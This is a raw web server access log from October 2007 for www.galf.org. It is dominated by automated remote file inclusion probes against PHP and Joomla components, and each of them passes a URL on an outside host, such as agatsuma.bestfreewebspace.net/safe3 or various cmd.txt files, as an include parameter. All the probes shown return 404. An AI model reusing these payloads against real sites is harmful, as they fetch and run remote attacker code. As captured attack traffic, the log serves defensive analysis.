211.62.35.165 - - [14/Oct/2007:12:33:11 -0700] "GET /logs/index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:33:18 -0700] "GET /logs/access.log/index.php?page=?=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:33:20 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.62.35.165 - - [14/Oct/2007:12:33:20 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.62.7.50 - - [14/Oct/2007:12:33:21 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:33:21 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:31 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:31 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:43 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.163.167.235 - - [14/Oct/2007:12:33:59 -0700] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:34:10 -0700] "GET /logs/access_070917.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:34:10 -0700] "GET /logs/access_070917.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:34:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:34:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.77.106 - - [14/Oct/2007:12:34:56 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.62.7.50 - - [14/Oct/2007:12:35:02 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:35:07 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.22 - - [14/Oct/2007:12:35:21 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.25.34 - - [14/Oct/2007:12:35:22 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.53.25.34 - - [14/Oct/2007:12:35:22 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
196.0.0.242 - - [14/Oct/2007:12:35:26 -0700] "GET /logs/access_070820.log/index.php?pag=http://www.digitalcrocker.org/.1/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.0.0.242 - - [14/Oct/2007:12:35:27 -0700] "GET /index.php?pag=http://www.digitalcrocker.org/.1/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.0.0.242 - - [14/Oct/2007:12:35:28 -0700] "GET /logs/index.php?pag=http://www.digitalcrocker.org/.1/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:35:34 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.41.127 - - [14/Oct/2007:12:35:59 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.41.127 - - [14/Oct/2007:12:35:59 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.41.127 - - [14/Oct/2007:12:35:59 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.199.30 - - [14/Oct/2007:12:36:03 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.199.30 - - [14/Oct/2007:12:36:03 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.199.30 - - [14/Oct/2007:12:36:03 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:36:13 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:36:13 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:36:14 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.25.34 - - [14/Oct/2007:12:36:15 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.25.34 - - [14/Oct/2007:12:36:16 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.5.173 - - [14/Oct/2007:12:36:26 -0700] "GET /logs/access_070917.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://Arcantus.reggaehost.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.5.173 - - [14/Oct/2007:12:36:26 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://Arcantus.reggaehost.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.5.173 - - [14/Oct/2007:12:36:26 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://Arcantus.reggaehost.com/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:36:42 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:36:42 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:36:42 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.234.75.91 - - [14/Oct/2007:12:36:51 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.67.244.181 - - [14/Oct/2007:12:36:53 -0700] "GET /logs/access_070826.log/akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:37:21 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:37:21 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:37:21 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.135.41.244 - - [14/Oct/2007:12:37:34 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.41.244 - - [14/Oct/2007:12:37:34 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.41.244 - - [14/Oct/2007:12:37:34 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.69.119 - - [14/Oct/2007:12:37:35 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.69.119 - - [14/Oct/2007:12:37:35 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.69.119 - - [14/Oct/2007:12:37:35 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:37:41 -0700] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:38:11 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:38:14 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:38:14 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:38:15 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.55.156.100 - - [14/Oct/2007:12:38:26 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.156.100 - - [14/Oct/2007:12:38:26 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.156.100 - - [14/Oct/2007:12:38:26 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:38:40 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.21.53.242 - - [14/Oct/2007:12:38:41 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.21.53.242 - - [14/Oct/2007:12:38:41 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.21.53.242 - - [14/Oct/2007:12:38:42 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:38:44 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.41.127 - - [14/Oct/2007:12:39:13 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.199.30 - - [14/Oct/2007:12:39:18 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:40:13 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:40:14 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:40:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:40:25 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:40:25 -0700] "GET //include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.62.35.165 - - [14/Oct/2007:12:40:26 -0700] "GET /logs//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:50 -0700] "GET /logs/access.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:51 -0700] "GET /index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:51 -0700] "GET /logs/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:52 -0700] "GET /logs/access.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:52 -0700] "GET /index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:40:52 -0700] "GET /logs/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.69.119 - - [14/Oct/2007:12:41:08 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:41:45 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
211.108.60.242 - - [14/Oct/2007:12:41:45 -0700] "GET //include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:41:46 -0700] "GET /logs//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.55.156.100 - - [14/Oct/2007:12:41:50 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.135.41.244 - - [14/Oct/2007:12:41:51 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.21.53.242 - - [14/Oct/2007:12:42:07 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:42:17 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:42:20 -0700] "GET /logs/access_070826.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.131.153.91 - - [14/Oct/2007:12:42:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.153.91 - - [14/Oct/2007:12:42:51 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:44:05 -0700] "GET /logs/access_071001.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.53.25.34 - - [14/Oct/2007:12:44:43 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.25.34 - - [14/Oct/2007:12:44:45 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
128.122.130.65 - - [14/Oct/2007:12:45:16 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
128.122.130.65 - - [14/Oct/2007:12:45:17 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.122.130.65 - - [14/Oct/2007:12:45:17 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:12:45:31 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:12:45:32 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:45:49 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:45:50 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:45:50 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:45:53 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:45:54 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:46:04 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:46:04 -0700] "GET //include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [14/Oct/2007:12:46:04 -0700] "GET /logs//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:46:05 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.62.35.165 - - [14/Oct/2007:12:46:06 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.62.35.165 - - [14/Oct/2007:12:46:06 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:46:10 -0700] "GET /logs/access_070625.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:46:11 -0700] "GET /index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:46:11 -0700] "GET /logs/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
85.25.147.124 - - [14/Oct/2007:12:46:28 -0700] "GET /logs/access_070917.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:46:28 -0700] "GET /logs/access_070917.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:47:01 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:47:01 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.25.147.124 - - [14/Oct/2007:12:47:01 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
204.15.10.33 - - [14/Oct/2007:12:47:18 -0700] "GET /logs/access_070625.log//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:47:18 -0700] "GET //jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [14/Oct/2007:12:47:18 -0700] "GET /logs//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:12:47:25 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:12:47:28 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:47:43 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:48:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:48:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
204.15.10.33 - - [14/Oct/2007:12:48:09 -0700] "GET /logs//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
